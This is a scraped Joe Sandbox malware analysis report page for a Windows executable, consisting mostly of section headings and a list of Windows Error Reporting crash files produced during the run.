Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Yc9hcFC1ux.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UUSIService.exe_a55e32dd8adfe3b265e5ba5d1f3848eeaef66cb3_ee152a1a_26710e55-faff-4a78-b285-495e9cfe9a47\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UUSIService.exe_a55e32dd8adfe3b265e5ba5d1f3848eeaef66cb3_ee152a1a_34405604-1e2a-41c7-9788-a059f91bfff0\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UUSIService.exe_a55e32dd8adfe3b265e5ba5d1f3848eeaef66cb3_ee152a1a_42f0b9f2-5a6d-4b5f-be19-ef246380adb8\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UUSIService.exe_a55e32dd8adfe3b265e5ba5d1f3848eeaef66cb3_ee152a1a_48a084e1-6547-42d8-b8fa-3a314400b0ad\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UUSIService.exe_a55e32dd8adfe3b265e5ba5d1f3848eeaef66cb3_ee152a1a_8b8ae7a4-81ce-4e8c-bbc4-9214fd51239e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UUSIService.exe_a55e32dd8adfe3b265e5ba5d1f3848eeaef66cb3_ee152a1a_a93f8d17-45b3-446a-ab27-7f429962a5fb\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UUSIService.exe_a55e32dd8adfe3b265e5ba5d1f3848eeaef66cb3_ee152a1a_eeedd8b0-beef-48c6-bd7c-591cb5ef94dc\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_UUSIService.exe_a55e32dd8adfe3b265e5ba5d1f3848eeaef66cb3_ee152a1a_fc274f58-3920-46f2-bedb-955044d36450\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER371A.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER37F6.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3826.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER50A2.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER51DC.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER51FC.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER56A8.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5755.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5785.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7001.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER70BE.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER70EE.tmp.xml

Windows Analysis Report
Yc9hcFC1ux.exe